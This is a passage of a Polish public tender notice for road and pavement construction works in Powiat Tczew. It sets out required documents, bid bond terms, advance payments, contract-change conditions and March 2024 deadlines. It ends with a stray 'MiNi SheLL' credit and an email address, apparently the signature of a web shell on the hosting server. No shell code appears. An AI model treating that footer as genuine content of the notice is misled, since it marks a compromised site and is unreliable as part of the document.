miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono jego upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Niniejszy dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>3) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentu o którym mowa w pkt 8.2<br/>ppkt 2 SWZ, zastępuje się go odpowiednio oświadczeniem Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, złożone – odpowiednio: pod przysięgą, przed organem sądowym lub administracyjnym, notariuszem, organem<br/>samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Niniejszy<br/>dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, długości chodnika i odcinka objętego robotą, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (według wzoru: Załącznik Nr 4 do SWZ –Wykaz robót budowlanych wykonanych) wraz z załączeniem dowodów<br/>określających, czy te roboty budowlane zostały wykonane należycie;<br/>2. Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia <br/>publicznego – zawierający informacje na temat osoby, skierowanej przez <br/>Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnej za <br/>świadczenie usług, kierowanie robotami budowlanymi, wraz z informacjami na <br/>temat jej kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia <br/>niezbędnego do wykonania zamówienia publicznego, a także zakresu <br/>wykonywanych przez nią czynności oraz informacją o podstawie do dysponowania tą osobą (według wzoru: Załącznik Nr 5 do SWZ – Wykaz osób skierowanych do realizacji zamówienia publicznego).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Warunkiem udziału w postępowaniu jest wniesienie wadium. Zamawiający określa wadium na kwotę 10.000,00 PLN (słownie złotych: dziesięć tysięcy 00/100).<br/>2. Wadium musi być wniesione przed upływem terminu składania ofert i utrzymane nieprzerwanie do dnia terminu związania ofertą.<br/>3 .Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku <br/>następujących formach: <br/>- pieniądzu, <br/>- gwarancjach bankowych, <br/>- gwarancjach ubezpieczeniowych,<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt <br/>2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości (Dz. U. z 2023 r. poz. 462).<br/>4. Jeżeli wadium zostanie wniesione w pieniądzu, to należy je wpłacić przelewem na rachunek bankowy Zamawiającego: <br/>Bank Spółdzielczy w Tczewie: 28 8345 0006 2002 0000 4564 0003.<br/>Na poleceniu przelewu należy wpisać: „Wadium – przetarg nr ZP.272.5.2024”<br/>5. W przypadku wnoszenia wadium w formie gwarancji lub poręczenia, o których mowa w pkt 3 Wykonawca przekazuje Zamawiającemu oryginał <br/>gwarancji lub poręczenia w postaci elektronicznej, który powinien zawierać następujące elementy:<br/>a) nazwę Zleceniodawcy (Wykonawcy), beneficjenta gwarancji (Zamawiającego), <br/>gwaranta (poręczyciela/Wystawcy) oraz wskazanie ich siedzib,<br/>b) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem <br/>(np. nazwa zadania, znak postępowania),<br/>c) kwotę gwarancji/poręczenia,<br/>d) termin ważności gwarancji/poręczenia (który nie może być krótszy niż termin <br/>związania ofertą z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień <br/>składania ofert),<br/>e) treść art. 98 ust. 6 Ustawy, określająca okoliczności zatrzymania wadium przez <br/>Zamawiającego,<br/>f) jednoznaczny zapis o gwarantowaniu wypłaty całej kwoty wadium w sposób <br/>nieodwołalny, bezwarunkowy i na pierwsze żądanie,<br/>g) w przypadku, gdy oferta zostanie złożona przez podmioty wspólnie ubiegające się <br/>o udzielenie zamówienia (np. konsorcjantów) – zabezpieczenie wadialne winno <br/>wymieniać wszystkie podmioty, składające wspólnie ofertę.<br/>Brak którejś z powyższych adnotacji w treści dokumentu wadialnego, będzie <br/>skutkować odrzuceniem oferty w trybie art. 226 ust. 1 pkt 14 Ustawy, to jest <br/>z uwagi na wniesienie wadium w sposób nieprawidłowy.<br/>6. W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu <br/>w terminie decydować będzie data wpływu środków na rachunek bankowy <br/>Zamawiającego wskazany w punkcie 18.4 SWZ.<br/>7. Okoliczności i zasady zwrotu wadium, jego zatrzymania określa Ustawa. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia w trybie art. 58 ust. 1 Ustawy (np. Konsorcjum bądź spółka cywilna), ustanawiają oni Pełnomocnika do reprezentowania Wykonawców w postępowaniu albo do reprezentowania i zawarcia umowy, na podstawie art. 58 ust. 2 Ustawy. Pełnomocnictwo powinno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu, w zakresie określonym w Rozdziale 7 SWZ. <br/>3. Zgodnie z art. 117 ust. 4 Ustawy, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. Wzór przedmiotowego oświadczenia stanowi Załącznik Nr 3 do SWZ.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy, zgodnie z art. 445 ust. 1 Ustawy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający przewiduje udzielenie zaliczki:<br/>1) Zamawiający udzieli Wykonawcy zaliczki w wysokości 5% wartości umowy.<br/>2) Zaliczka ta zostanie wypłacona Wykonawcy w terminie do 30 dni od dnia przekazania Wykonawcy placu budowy.<br/>3) Wypłacona zaliczka podlega zaliczeniu na poczet wynagrodzenia przysługującego Wykonawcy. Wykonawcy zostanie wypłacone wynagrodzenie w kwocie pomniejszonej o kwotę udzielonej zaliczki, chyba, że zaliczka ta zostanie wcześniej zwrócona Zamawiającemu. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany postanowień niniejszej umowy mogą być dokonane, za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności, w następujących przypadkach:<br/>1) zmiany osoby: kierownika budowy - polegającą na wyznaczeniu nowej osoby <br/>pełniącej daną funkcję, pod warunkiem spełniania przez tę nową osobę <br/>odpowiednich postanowień SWZ;<br/>2) zmiany lub przedłużenia terminu wykonania robót w przypadkach:<br/>a) natrafienia na różnego rodzaju wykopaliska (zabytki) i związaną z tym <br/>koniecznością prowadzenia prac archeologicznych;<br/>b) konieczności dokonania zmian w dokumentacji projektowej o czas niezbędny <br/>do dokonania zmian w projekcie oraz ewentualnie o czas niezbędny dla <br/>dostosowania się Wykonawcy do takiej zmiany;<br/>c) konieczności wykonania robót zamiennych, o których mowa w pkt 7), o czas <br/>niezbędny na ich realizację;<br/>d) konieczności poprawy warunków wykonywania robót zagrażających <br/>bezpieczeństwu o czas niezbędny do dokonania ich poprawy, jeżeli warunki <br/>zagrażające bezpieczeństwu powstały bez winy Wykonawcy;<br/>e) niezależnego od stron umowy przedłużania się okresu trwania procedur <br/>prowadzonych przez organy administracji publicznej lub inne podmioty - właściwe do wydania niezbędnych decyzji, pozwoleń, uzgodnień, opinii, <br/>stanowisk itp. niezbędnych do prawidłowej realizacji robót budowlanych;<br/>f) konieczności wszczęcia dodatkowych procedur prowadzonych przez organy <br/>administracji publicznej lub inne podmioty właściwe do wydania niezbędnych <br/>decyzji, pozwoleń, uzgodnień, opinii, stanowisk itp. niezbędnych do <br/>prawidłowej realizacji robót budowlanych, których nie dało się przewidzieć na <br/>etapie zawierania niniejszej umowy;<br/>g) niezależnego od Wykonawcy przedłużania się okresu trwania dostawy <br/>trudnodostępnych, wymagających zamówienia, materiałów niezbędnych<br/>do prawidłowej realizacji robót budowlanych;<br/>h) uzasadnionego wstrzymania danych robót przez kierownika budowy o czas na <br/>jaki nastąpiło wstrzymanie danych robót. Uzasadnienie to winno być <br/>potwierdzone przez Nadzór Inwestorski;<br/>i) konieczności dokonania zmian dokumentacji projektowej, wynikającej <br/>z zaistnienia obiektywnej niemożności wykonania robót w oparciu <br/>o dokumentacje projektową, spowodowaną warunkami terenowymi, <br/>geologicznymi, hydrogeologicznymi istniejącymi na placu budowy bądź <br/>innymi wadami dokumentacji projektowej;<br/>j) niesprzyjających warunków atmosferycznych tj. przemarzanie gruntu więcej <br/>niż 1 m p.p.t.<br/>k) uzasadnionego wstrzymania danych robót przez kierownika budowy wraz <br/>z wpisem do dziennika budowy o czas, na jaki nastąpiło wstrzymanie danych <br/>robót. Uzasadnienie to winno być potwierdzone przez Nadzór inwestorski;<br/>l) wystąpienia siły wyższej, o której mowa w pkt 7);<br/>3) zmiany wysokości wynagrodzenia Wykonawcy w przypadkach:<br/>a) konieczności realizacji przez Wykonawcę dodatkowych robót budowlanych, <br/>których nie uwzględniono w zamówieniu podstawowym, o ile stały się one <br/>niezbędne i zostały spełnione wszystkie warunki o których mowa w art. 455 <br/>ust. 1 pkt. 3 lit. a-c ustawy Pzp;<br/>b) konieczności zmiany umowy, w tym w szczególności zmiany wysokości ceny <br/>spowodowanej okolicznościami o których Zamawiający, działając z należytą <br/>starannością nie mógł przewidzieć, o ile zmiana ta nie modyfikuje ogólnego <br/>charakteru umowy, a wzrost ceny spowodowany każda kolejną zmianą nie <br/>przekracza 50% wartości pierwotnej umowy, zgodnie z art. 455 ust. 1 pkt 4 <br/>ustawy Pzp;<br/>c) zmiany zakresu przedmiotu zamówienia zaakceptowanego przez Inspektora <br/>nadzoru i Przedstawiciela Zamawiającego;<br/>4) decyzji Wykonawcy, za uprzednią zgodą Zamawiającego, o zleceniu określonego <br/>zakresu robót podwykonawcom, pomimo iż w swojej ofercie przetargowej <br/>Wykonawca oświadczył, że zamierza pełen zakres robót budowlanych wykonać <br/>własnymi siłami; <br/>5) zmiany podwykonawcy, za uprzednią zgodą Zamawiającego oraz pod warunkiem spełniania przez nowego podwykonawcę określonych postanowień SWZ; Ciąg dalszy rodzaju i zakresu zmian umowy znajduje się w Załączniku Nr 7 do SWZ - Projektowane postanowienia umowy (Wzór umowy). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/powiat_tczew</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-05 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-04-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com